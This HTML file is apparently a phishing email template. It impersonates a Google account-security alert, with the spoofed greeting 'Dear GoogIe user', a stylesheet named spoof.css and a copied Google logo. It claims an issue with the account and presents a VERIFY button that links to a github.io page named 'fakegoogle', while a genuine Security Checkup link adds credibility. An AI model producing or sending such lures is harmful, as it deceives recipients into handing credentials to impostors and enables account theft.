<!doctype html>
<html>

<head>
    <link rel="stylesheet" href="spoof.css">

    <style>
        @font-face {
            font-family: 'Google Sans';
            src: URL('Google.ttf') format('truetype');
        }

        .box>img {
            margin-top: 20px;
            margin-left: 20px;
        }

        p {
            font-family: 'Google Sans', arial, sans-serif;
            color: rgb(153, 153, 153);
            margin-top: 20px;
            margin-right: 20px;
            margin-left: 20px;
        }

        #button {
            color: white;
            font-family: 'Google Sans', arial, sans-serif;
            background: #448aff;
            border-radius: 5px;
            width: 74px;
            text-align: center;
            padding-top: 10px;
            padding-bottom: 10px;
            margin-top: 20px;
            margin-left: 20px;
            cursor: pointer;
        }
    </style>
</head>

<body>
    <div class="box">
        <img src="https://ci4.googleusercontent.com/proxy/fgyAOAArfa_4DKYou3UfE1Wd6b8N0Wb-cu8BHX6HzyBctpv3tQSJDXGXre3uFwHmxn56_slU7VjH4sUfue919p_MTFXfZJjSy4-yRBe6YhCv=s0-d-e1-ft#https://services.google.com/fh/files/emails/logo_google_lg.png"
            width="100px">
        <h1 class="header1">Dear GoogIe user,</h1>
        <p>
            We have detected an issue with your account. Please verify that this is you from one of your trusted
            devices. Users with extra ways to verify their identity are far less likely to be hacked or locked out. Add additional ways to prove it's really you and see other personalized security recommendations in the <a href="https://myaccount.google.com/security-checkup" target="_blank">Security Checkup</a>.
        </p>
        <a href="https://cukmekerb.github.io/fakegoogle/" target="_blank">
            <div id="button">
                VERIFY
            </div>
        </a>
    </div>
</body>

</html>